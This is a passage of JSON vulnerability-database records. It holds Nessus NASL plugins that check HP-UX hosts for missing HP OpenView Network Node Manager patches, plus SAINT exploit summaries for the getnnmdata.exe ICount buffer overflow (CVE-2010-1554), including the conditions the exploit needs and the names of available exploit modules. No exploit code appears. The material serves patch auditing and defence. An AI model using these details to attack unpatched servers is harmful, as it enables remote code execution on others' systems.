version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVEVENT-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVMIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVPMD-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVSNMP-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-EVNT\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-FW\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-SRV\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVEVENTMIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVMIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVSNMP-MIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVWIN-MAN\", version:\"B.07.50.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:32:18", "description": "s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 26 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2010-1550 (SSRT090225,\n ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564)\n CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553\n (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229,\n ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server. References: CVE-2010-1964 (SSRT100026,\n ZDI-CAN-683) CVE-2010-1960 (SSRT100027, ZDI-CAN-684)\n CVE-2010-1961 (SSRT100028, ZDI-CAN-685).\n\n - A potential security vulnerability has been identified\n with HP OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server.", "edition": 24, "published": "2010-05-17T00:00:00", "title": "HP-UX PHSS_40708 : s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 26", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1964", "CVE-2010-2709", "CVE-2010-1961", "CVE-2010-1555", "CVE-2010-1552", "CVE-2010-1960", "CVE-2010-1550", "CVE-2010-1554", "CVE-2010-1553", "CVE-2010-1551"], "modified": "2010-05-17T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_40708.NASL", "href": "https://www.tenable.com/plugins/nessus/46348", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_40708. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46348);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2010-1550\", \"CVE-2010-1551\", \"CVE-2010-1552\", \"CVE-2010-1553\", \"CVE-2010-1554\", \"CVE-2010-1555\", \"CVE-2010-1960\", \"CVE-2010-1961\", \"CVE-2010-1964\", \"CVE-2010-2709\");\n script_xref(name:\"HP\", value:\"emr_na-c02153379\");\n script_xref(name:\"HP\", value:\"emr_na-c02217439\");\n script_xref(name:\"HP\", value:\"emr_na-c02446520\");\n script_xref(name:\"HP\", value:\"SSRT010098\");\n\n script_name(english:\"HP-UX PHSS_40708 : s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 26\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 26 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2010-1550 (SSRT090225,\n ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564)\n CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553\n (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229,\n ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server. References: CVE-2010-1964 (SSRT100026,\n ZDI-CAN-683) CVE-2010-1960 (SSRT100027, ZDI-CAN-684)\n CVE-2010-1961 (SSRT100028, ZDI-CAN-685).\n\n - A potential security vulnerability has been identified\n with HP OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5f413ca\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f9c68a79\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?094465cf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_40708 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/03\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2010/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23 11.31\", proc:\"ia64\"))\n{\n exit(0, \"The host is not affected since PHSS_40708 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_40708\", \"PHSS_41243\", \"PHSS_41607\", \"PHSS_41858\", \"PHSS_42233\", \"PHSS_43047\", \"PHSS_43354\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-CORE\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-IPV6\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PD\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PESA\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVMIB-CONTRIB\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNM-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVRPT-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrMan.OVNNM-RUN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrRtDOC.OVNNM-DOC-REUS\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrRtDOC.OVNNM-ENG-DOC\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVDB-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVEVENT-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVMIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVPMD-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVSNMP-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-EVNT\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-FW\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-SRV\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVEVENTMIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVMIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVSNMP-MIN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVWIN-MAN\", version:\"B.07.50.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:32:18", "description": "s700_800 11.11 OV NNM7.01 Intermediate Patch 13 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential vulnerability has been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code. (HPSBMA02424 SSRT080125)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2009-0898 (SSRT090101)\n CVE-2009-3845 (SSRT090037, ZDI-CAN-453) CVE-2009-3846\n (SSRT090122, ZDI-CAN-526) CVE-2009-3847 (SSRT090128,\n ZDI-CAN-532) CVE-2009-3848 (SSRT090129, ZDI-CAN-522)\n CVE-2009-3849 (SSRT090130, ZDI-CAN-523) CVE-2009-4176\n (SSRT090131, ZDI-CAN-532) CVE-2009-4177 (SSRT090132,\n ZDI-CAN-538) CVE-2009-4178 (SSRT090133, ZDI-CAN-539)\n CVE-2009-4179 (SSRT090134, ZDI-CAN-540) CVE-2009-4180\n (SSRT090135, ZDI-CAN-542) CVE-2009-4181 (SSRT090164,\n ZDI-CAN-549). (HPSBMA02483 SSRT090257)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to allow\n execution of arbitrary code. (HPSBMA02400 SSRT080144)\n\n - Potential vulnerabilities have been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerabilities could be exploited remotely to execute\n arbitrary code. (HPSBMA02416 SSRT090008)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2010-1550 (SSRT090225,\n ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564)\n CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553\n (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229,\n ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - A potential vulnerability has been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code. (HPSBMA02425 SSRT080091)", "edition": 25, "published": "2010-05-10T00:00:00", "title": "HP-UX PHSS_40705 : s700_800 11.11 OV NNM7.01 Intermediate Patch 13", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3848", "CVE-2009-3846", "CVE-2009-3847", "CVE-2009-4177", "CVE-2009-0921", "CVE-2009-4180", "CVE-2009-3849", "CVE-2009-0898", "CVE-2009-4181", "CVE-2010-1555", "CVE-2009-4176", "CVE-2009-4178", "CVE-2010-1552", "CVE-2009-4179", "CVE-2008-2438", "CVE-2009-0920", "CVE-2010-1550", "CVE-2008-0067", "CVE-2010-1554", "CVE-2010-1553", "CVE-2009-3845", "CVE-2009-0720", "CVE-2010-1551"], "modified": "2010-05-10T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_40705.NASL", "href": "https://www.tenable.com/plugins/nessus/46261", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_40705. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46261);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-0067\", \"CVE-2008-2438\", \"CVE-2009-0720\", \"CVE-2009-0898\", \"CVE-2009-0920\", \"CVE-2009-0921\", \"CVE-2009-3845\", \"CVE-2009-3846\", \"CVE-2009-3847\", \"CVE-2009-3848\", \"CVE-2009-3849\", \"CVE-2009-4176\", \"CVE-2009-4177\", \"CVE-2009-4178\", \"CVE-2009-4179\", \"CVE-2009-4180\", \"CVE-2009-4181\", \"CVE-2010-1550\", \"CVE-2010-1551\", \"CVE-2010-1552\", \"CVE-2010-1553\", \"CVE-2010-1554\", \"CVE-2010-1555\");\n script_bugtraq_id(34738, 34812);\n script_xref(name:\"HP\", value:\"emr_na-c01646081\");\n script_xref(name:\"HP\", value:\"emr_na-c01696729\");\n script_xref(name:\"HP\", value:\"emr_na-c01723303\");\n script_xref(name:\"HP\", value:\"emr_na-c01728300\");\n script_xref(name:\"HP\", value:\"emr_na-c01950877\");\n script_xref(name:\"HP\", value:\"emr_na-c02153379\");\n script_xref(name:\"HP\", value:\"SSRT010098\");\n script_xref(name:\"HP\", value:\"SSRT080091\");\n script_xref(name:\"HP\", value:\"SSRT080125\");\n script_xref(name:\"HP\", value:\"SSRT080144\");\n script_xref(name:\"HP\", value:\"SSRT090008\");\n script_xref(name:\"HP\", value:\"SSRT090257\");\n\n script_name(english:\"HP-UX PHSS_40705 : s700_800 11.11 OV NNM7.01 Intermediate Patch 13\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.11 OV NNM7.01 Intermediate Patch 13 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential vulnerability has been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code. (HPSBMA02424 SSRT080125)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2009-0898 (SSRT090101)\n CVE-2009-3845 (SSRT090037, ZDI-CAN-453) CVE-2009-3846\n (SSRT090122, ZDI-CAN-526) CVE-2009-3847 (SSRT090128,\n ZDI-CAN-532) CVE-2009-3848 (SSRT090129, ZDI-CAN-522)\n CVE-2009-3849 (SSRT090130, ZDI-CAN-523) CVE-2009-4176\n (SSRT090131, ZDI-CAN-532) CVE-2009-4177 (SSRT090132,\n ZDI-CAN-538) CVE-2009-4178 (SSRT090133, ZDI-CAN-539)\n CVE-2009-4179 (SSRT090134, ZDI-CAN-540) CVE-2009-4180\n (SSRT090135, ZDI-CAN-542) CVE-2009-4181 (SSRT090164,\n ZDI-CAN-549). (HPSBMA02483 SSRT090257)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to allow\n execution of arbitrary code. (HPSBMA02400 SSRT080144)\n\n - Potential vulnerabilities have been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerabilities could be exploited remotely to execute\n arbitrary code. (HPSBMA02416 SSRT090008)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2010-1550 (SSRT090225,\n ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564)\n CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553\n (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229,\n ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - A potential vulnerability has been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code. (HPSBMA02425 SSRT080091)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01646081\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdefacfb\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01696729\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ed695dee\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01723303\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?45827469\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01728300\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0bbcab1d\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?422f4693\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5f413ca\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_40705 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(94, 119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/26\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2010/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11\"))\n{\n exit(0, \"The host is not affected since PHSS_40705 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_40705\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-CORE\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PD\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PESA\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVMIB-CONTRIB\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNM-RUN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-JPN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-SCH\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVRPT-RUN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-JPN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-SCH\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrMan.OVNNM-RUN-MAN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVDB-RUN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVEVENT-MIN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVMIN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVSNMP-MIN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWIN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-EVNT\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-FW\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-SRV\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVEVENTMIN-MAN\", version:\"B.07.01.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "description": "Added: 08/23/2010 \nCVE: [CVE-2010-1554](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1554>) \nBID: [40071](<http://www.securityfocus.com/bid/40071>) \nOSVDB: [64976](<http://www.osvdb.org/64976>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in Network Node Manager allows remote attackers to execute arbitrary commands by sending a request for the getnnmdata.exe CGI program with a specially crafted ICount parameter. \n\n### Resolution\n\nApply the fix referenced in [HPSBMA02527 SSRT010098](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-10-085/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, Read and Execute privileges on the file '%windir%\\system32\\cmd.exe' must be granted to the Internet Guest Account \"IUSR_<computername>\" for the exploit to work properly. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2010-08-23T00:00:00", "published": "2010-08-23T00:00:00", "id": "SAINT:34D6D846B7772CD0CF4771A13E75FC3F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getnnmdata_icount", "type": "saint", "title": "HP OpenView NNM getnnmdata.exe CGI ICount Parameter Buffer Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "edition": 2, "description": "Added: 08/23/2010 \nCVE: [CVE-2010-1554](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1554>) \nBID: [40071](<http://www.securityfocus.com/bid/40071>) \nOSVDB: [64976](<http://www.osvdb.org/64976>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in Network Node Manager allows remote attackers to execute arbitrary commands by sending a request for the getnnmdata.exe CGI program with a specially crafted ICount parameter. \n\n### Resolution\n\nApply the fix referenced in [HPSBMA02527 SSRT010098](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-10-085/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, Read and Execute privileges on the file '%windir%\\system32\\cmd.exe' must be granted to the Internet Guest Account \"IUSR_<computername>\" for the exploit to work properly. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-08-23T00:00:00", "published": "2010-08-23T00:00:00", "id": "SAINT:E31B141E7568E9F6BD86756DDBEE0E76", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getnnmdata_icount", "type": "saint", "title": "HP OpenView NNM getnnmdata.exe CGI ICount Parameter Buffer Overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:32", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "description": "Added: 08/23/2010 \nCVE: [CVE-2010-1554](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1554>) \nBID: [40071](<http://www.securityfocus.com/bid/40071>) \nOSVDB: [64976](<http://www.osvdb.org/64976>) \n\n\n### 